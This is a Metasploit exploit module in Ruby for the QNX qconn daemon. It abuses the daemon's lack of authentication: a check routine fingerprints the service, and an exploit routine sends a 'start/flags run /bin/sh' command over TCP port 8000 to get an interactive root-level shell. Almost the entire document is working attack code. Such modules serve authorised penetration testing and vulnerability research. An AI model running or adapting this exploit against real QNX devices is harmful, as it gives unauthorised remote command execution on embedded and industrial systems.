##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::Tcp
  prepend Msf::Exploit::Remote::AutoCheck
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'QNX qconn Command Execution',
        'Description' => %q{
          This module uses the qconn daemon on QNX systems to gain a shell.
          The QNX qconn daemon does not require authentication and allows
          remote users to execute arbitrary operating system commands.
          This module has been tested successfully on QNX Neutrino 6.5.0 (x86)
          and 6.5.0 SP1 (x86).
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'David Odell', # Discovery
          'Mor!p3r', # PoC
          'bcoles' # Metasploit
        ],
        'References' => [
          ['EDB', '21520'],
          ['URL', 'https://www.optiv.com/blog/pentesting-qnx-neutrino-rtos'],
          ['URL', 'http://www.qnx.com/developers/docs/6.5.0SP1/neutrino/utilities/q/qconn.html'],
          ['URL', 'http://www.qnx.com/developers/docs/6.5.0/topic/com.qnx.doc.neutrino_utilities/q/qconn.html']
        ],
        'Payload' => {
          'BadChars' => '',
          'DisableNops' => true,
          'Compat' => {
            'PayloadType' => 'cmd_interact',
            'ConnectionType' => 'find'
          }
        },
        'DefaultOptions' => {
          'WfsDelay' => 10,
          'PAYLOAD' => 'cmd/unix/interact'
        },
        'Platform' => 'unix', # QNX Neutrino
        'Arch' => ARCH_CMD,
        'Targets' => [['Automatic', {}]],
        'Privileged' => false,
        'DisclosureDate' => '2012-09-04',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => []
        }
      )
    )
    register_options(
      [
        Opt::RPORT(8000),
        OptString.new('SHELL', [true, 'Path to system shell', '/bin/sh'])
      ]
    )
  end
  def check
    vprint_status('Sending check...')
    connect
    res = sock.get_once(-1, 10)
    return CheckCode::Unknown('Connection failed') unless res
    return CheckCode::Safe unless res.include?('QCONN')
    sock.put("service launcher\n")
    res = sock.get_once(-1, 10)
    return CheckCode::Safe unless res.to_s.include?('OK')
    fingerprint = Rex::Text.rand_text_alphanumeric(5..10)
    sock.put("start/flags run /bin/echo /bin/echo #{fingerprint}\n")
    return CheckCode::Safe unless res.to_s.include?('OK')
    Rex.sleep(1)
    res = sock.get_once(-1, 10)
    return CheckCode::Safe unless res.to_s.include?(fingerprint)
    disconnect
    CheckCode::Vulnerable
  end
  def exploit
    connect
    res = sock.get_once(-1, 10)
    fail_with(Failure::Unreachable, 'Connection failed') unless res
    fail_with(Failure::UnexpectedReply, 'Unexpected reply') unless res.include?('QCONN')
    sock.put("service launcher\n")
    res = sock.get_once(-1, 10)
    fail_with(Failure::UnexpectedReply, 'Unexpected reply') unless res.to_s.include?('OK')
    print_status('Sending payload...')
    sock.put("start/flags run #{datastore['SHELL']} -\n")
    Rex.sleep(1)
    fail_with(Failure::UnexpectedReply, 'Shell negotiation failed. Unexpected reply.') unless negotiate_shell(sock)
    print_good('Payload sent successfully')
    handler
  end
  def negotiate_shell(sock)
    Timeout.timeout(15) do
      loop do
        data = sock.get_once(-1, 10)
        return if data.blank?
        if data.include?('#') || data.include?('No controlling tty')
          return true
        end
        Rex.sleep(0.5)
      end
    end
  rescue ::Timeout::Error
    return nil
  end
end